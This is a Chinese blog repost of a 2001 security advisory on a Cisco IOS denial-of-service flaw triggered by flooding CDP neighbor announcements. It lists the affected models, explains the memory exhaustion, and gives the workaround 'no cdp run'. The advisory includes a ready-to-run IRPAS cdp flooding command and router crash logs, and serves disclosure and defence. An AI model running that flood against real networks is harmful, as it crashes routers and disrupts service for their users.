使用CDP协议的CISCO IOS系统存在拒绝服务攻击(from xfocus)

最新推荐文章于 2022-04-07 14:32:29 发布
最新推荐文章于 2022-04-07 14:32:29 发布
阅读量1.6k 收藏
点赞数
分类专栏: 网络技术 文章标签: cisco ios alignment allocation exception command
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/stevexk/article/details/600568
版权

使用CDP协议的CISCO IOS系统存在拒绝服务攻击


发布时间:2001-10-10
更新时间:2001-10-10
严重程度:
威胁程度:远程拒绝服务
错误类型:设计错误
利用方式:服务器模式

受影响系统
Cisco 1005    IOS 11.1.*
Cisco 1603    IOS 11.2, 11.3.11b
Cisco 2503    IOS 12.0.19
Cisco 2600    IOS 12.1.?
Catalyst 2940XL    IOS 12.0(5.1)XP
详细描述
使用Cisco Discovery Protocol(CDP)协议的CISCO ISO系统存在拒绝服务攻击。

当大量使用CDP neighbor announcements,ISOISO会消耗所有内存来存储邻居
信息,设备就不能执行其他如路由更新或者接受telnet连接操作。

CDP协议是第二层协议因此独立于第三层协议,CISCO 设备定期发送更新来使自身
知道它的邻居,因为其是工作在第二层的协议,这些帧不会被路由,这样发送给
Ethernet的更新将是一个多播地址01:00:0C:CC:CC:CC。

如果cisco 设备从另一个设备中接收到CDP 帧,它会拷贝这些内容到内部数据结构,
你可以通过"show cdp neighbors"命令来查看信息。这些信息包括设备ID,兼容性,
平台和发送者端口ID。CDP 帧中也包含hold timer值来告诉邻居丢弃该信息的维持
时间,最大值为225秒。

内部数据结构看起来使用远程设备ID作为KEY,当接受到2个同样的但长的设备ID时,
一些IOS版本将不能作为同一设备ID表识并独立存储。

当使用大的包含随机设备ID和来自随机数据连接地址的CDP帧来大量冲刷网络段
时,不同的IOS版本会有不同的反映,一般包括:

+ 在3到5个帧接受到后重新启动
+ 在数千个帧后停止工作
+ 使用所有可用内存来存储CDP邻居信息知道hold timer值过期。

当内存被消耗过多时,CISCO设备将不能操作其他路由等服务。

测试代码
要发送CDP信息,你可以使用Phenoelit IRPAS工具包的中CDP 发送工具:

linuxbox# ./cdp -i eth0 -m0 -n 100000 -l 1480 -r -v

(小心使用,所有有此漏洞并在数据链路多播域中的CISCO设备都会受到影响)

Reaction of a Cisco 1603 / IOS 11.2(4):

    radio#
    %SYS-2-MALLOCFAIL: Memory allocation of 1480 bytes failed from
    0x81B3BE6, pool Processor, alignment 0
    -Process= "CDP Protocol", ipl= 0, pid= 9
    -Traceback= 80ABDCC 80ACF46 81B3BEE 81B3B72 81B276A 81B224C
    radio#
    %SYS-2-MALLOCFAIL: Memory allocation of 96 bytes failed from
    0x81B26D2, pool Processor, alignment 0
    -Process= "CDP Protocol", ipl= 0, pid= 9
    -Traceback= 80ABDCC 80ACF46 81B26DA 81B224C
    %SYS-2-MALLOCFAIL: Memory allocation of 96 bytes failed from
    0x81B26D2, pool Processor, alignment 0
    -Process= "CDP Protocol", ipl= 0, pid= 9
    -Traceback= 80ABDCC 80ACF46 81B26DA 81B224C
    radio#sh ?
    % Unrecognized command
    radio#show ?
    % Unrecognized command
    radio#


    Reaction after 'debug cdp packets':

    %Log packet overrun, potential memory corruption, PC 0x81B2720, format:
    %s
    %Log packet overrun, potential memory corruption, PC 0x81B2720, format:
    %s
    ....[lots of these].....
    %Log packet overrun, potential memory corruption, PC 0x81B2720, format:
    %s
    %Log packet overrun, potential memory corruption, PC 0x81B2720, format:
    %s

    *** BUS ERROR ***
    access address = 0x5f227998
    program counter = 0x80ad45a
    status register = 0x2700
    vbr at time of exception = 0x4000000
    special status word = 0x0045
    faulted cycle was a longword read

    monitor: command "boot" aborted due to exception


    System Bootstrap, Version .....
    Copyright (c) 1994-1996 by cisco Systems, Inc.
    C1600 processor with 2048 Kbytes of main memory

    program load complete, entry point: 0x4018060, size: 0x1da950

解决方案
临时方法:配置'no cdp run' 命令关闭CDP协议,或者更新IOS版本。

相关信息
发现者:
FX        <fx@phenoelit.de>
FtR         <ftr@phenoelit.de>
kim0        <kim0@phenoelit.de>
smoovB        <not disclosed>
Phenoelit Group    ( http://www.phenoelit.de)

参考资料: http://www.phenoelit.de/stuff/CiscoCDP.txt
stevexk
关注
专栏目录
思科arp欺骗攻击cdp攻击,DHCP攻击实验命令笔记
m0_67262402的博客
06-19 1129
思科arp欺骗攻击cdp攻击,DHCP攻击实验命令笔记
针对CDP协议攻击分析及安全防护
05-19 355
针对CDP协议攻击分析及安全防护 熟悉Cisco的朋友都知道CDP协议是思科公司独特的发现协议,在思科公司出产的所有路由器和交换机里面都能运行此协议,一台运行C D P的路由器或交换机能够得知与它直接相连的邻居端口和主机名信息。也可以得知一些附加信息如:邻居的硬件模式号码及其性能。这样通过CDP的我们能得到相关联的路由器名、路由器端口信息、IOS版本信息、 IOS平台信息、硬件版本...
严重的 iOS 漏洞可导致拒绝服务或任意代码执行,苹果已修复
smellycat000的专栏
07-26 320
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士苹果发布安全更新,解决数十个 iOS 和 macOS 漏洞,其中包括一个严重的名为 “WiFiDemon” 的 iOS 漏洞,它可...
思科认证CCNA专业英文词汇全集
weixin_34393428的博客
10-28 243
CCNA为思科最基础的入门认证,其中,考试偏重网络概念和理论,对于初学者来说,不少专业英文术语难以理解,导致学员学习进度维难。CISCO系列认证的原版教材,专业词汇出现频率积高,考生只要熟悉本文,相信学习起来一定事半功倍。    10BaseT-----原始IEEE802.3标准的一部分,1OBaseT是1OMb/s基带以太网规范,它使用两对双绞电缆(3类、4类或5类),一对...
redis内存溢出问题 Out of Memory allocation
m0_67392182的博客
04-07 1539
最近使用redis存储人员头像,在使用的过程中出现了当redis内存占用超过3G的样子,就会出现溢出的问题,然后就寻找问题. 1.内核参数 vm.overcommit_memory=1 net.core.somaxconn = 2048 2.redis自身的最大内存设置 maxmemory 30720mb maxmemory-policy volatitle-lru 这两个都已经设置好了的,按道理redis到达设置的最大内存量,会根据内存清除策略来保证不会内存溢出的,服务器的内存有60G的,现在都没有到达设
CDP协议pcap数据包;CDP协议报文解析
最新发布
03-23
CDP协议pcap数据包下载,支持抓包软件(如:wireshark)打开并学习CDP协议报文解析。需要其他协议,请查看我发布的其他资源。
浅谈CDP协议方案
01-19
CDPCisco Discovery Protocol,Cisco设备发现协议)用于发现直连的CISCO设备相关信息。CDP利用直连的两个设备间定时发送hello信息(CDP数据包)维持邻居关系。  默认情况下,每隔60秒的时间,每个CISCO设备都要...
CDP和LLDP协议详解.doc
07-12
CDP(思科发现协议)是一种二层协议,用于获取相邻设备的协议地址以及发现这些设备的平台信息。CDP 可以为路由器提供正在使用的接口信息。它是思科设备中的一种信息收集工具,常用于获取思科直连设备的相关信息。 ...
CDP协议基础解析
10-24
这也是思科网络设备默认启用的一种第二层协议,而且还是识别所连接设备详细信息的一种重要协议。在故障排错、性能优化等方面有着不可替代的作用。不过可惜的是,其也存在着一定的安全隐患。在这篇文章中,笔者就对...
usus使用Chrome调试协议CDP渲染页面
08-08
下面我们将详细探讨`usus`如何使用CDP以及其在CSS渲染中的应用。 首先,让我们理解CDP。Chrome调试协议是一组JSON-over-WebSocket协议,它为开发者提供了丰富的功能,如控制页面导航、修改DOM、模拟用户输入、分析...
交换机环路问题一例
weixin_34209851的博客
08-31 1596
问题: 昨天监控系统报告一台Cisco 3550交换机工作不正常,在局域网内ping值竟然达到了300多ms。登上这台交换机查看日志如下,问题为内存不足。这台交换机一直工作很正常,出现内存不足极有可能是病毒造成的。登上监控系统查看了一下这台交换机各个端口的使用率,fa0/17端口的占用率竟然高达90%。去机房查看了此端口,其一直显示为橙色状态,并且闪烁频率很高...
New Memory allocation 1046759 bytes is smaller than the minimum allocation size of 1048576 bytes.
Format的专栏
04-14 5621
org.apache.spark.SparkException: Job aborted due to stage failure: Task 0 in stage 3.0 failed 4 times, most recent failure: Lost task 0.3 in stage 3.0 (TID 78, hdp57.car.bj2.yongche.com): org.apache.h
一次线上 tomcat jvm内存崩溃的问题
qq_38324542的博客
10-12 951
@RequestMapping("syncProxyInfo") public ReturnValue syncAgentInfo(HttpServletRequest request) { long start=new Date().getTime(); try { JSONObject jsonObject=CoreUtil.getBodyJSONObj(request); ...
路由交换实验二——路由器密码恢复
今天怎么又下雨的博客
10-15 944
路由器密码恢复原理开始实验重启路由修改寄存器的值重新启动恢复密码还原寄存器的值保存配置 原理 路由器的内部组件主要有主板、CPU、存贮系统和接口。 其中存贮系统包括: 正常启动顺序为123,3为非易失内存中的配置文件(包含密码),想要恢复密码需要先跳过配置文件,即启动顺序更改为12。 开始实验 重启路由 通过CONSOLE连接路由器,加电重启,10秒内按CTRL+BREAK,进入监控模式。 System Bootstrap, Version 12.1(3r)T2, RELEASE SOFTWARE (f
深度优先搜索DFS | 回溯算法:力扣46. 全排列
weixin_42042056的博客
06-30 249
1、题目描述: 2、题解: 回溯算法框架: result = [] def backtrack(选择列表,路径): if 满足结束条件: result.add(路径) return for 选择 in 选择列表: 做选择 backtrack(选择列表,路径) 撤销选择 # 做选择 将该选择从选择列表移除 路径.add(选择) # 撤销选择 路径.remove(选择) 将该选择再加入选择列表
针对CDP协议***分析及安全防护
weixin_34323858的博客
01-04 150
针对CDP协议***分析及安全防护&lt;?xml:namespace prefix="o"&gt; ?xml:namespace&gt;熟悉Cisco的朋友都知道CDP协议是思科公司独特的发现协议,在思科公司出产的所有路由器和交换机里面都能运行此协议,一台运行C D P的路由器或交换机能够得知与它直接相连的邻居端口和主机名信息。也可以得知一些附加信息如:邻居的硬件模式号码及其性能。这样通过CDP...
malloc申请大内存报错分析
zhangwenjianqin的专栏
06-08 5629
每个进程会有4G的虚拟地址空间, malloc得到的的地址都是虚拟地址, 并且当malloc的时候, 操作系统并不会将实际的内存分配给进程的, 所以malloc只会占用进程自身的虚拟地址空间。 我以前也做过申请内存的测试,并且写了一个短文: 操作系统: Redhat Linux AS5 32bit 服务器内存: 4G 服务器类型: I32 最近写搜索引擎, 因为创建索引需要大量的
Cisco IOSCDP:网络管理的核心技术
"本资源主要介绍了思科(Cisco)的网络大管家——Cisco IOSCDP。这是一份来自北京大学出版社的网络技术类规划教材,针对21世纪的高校应用人才培养,旨在帮助学生深入理解网络工程实践。" 在第4章"网络大管家"中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值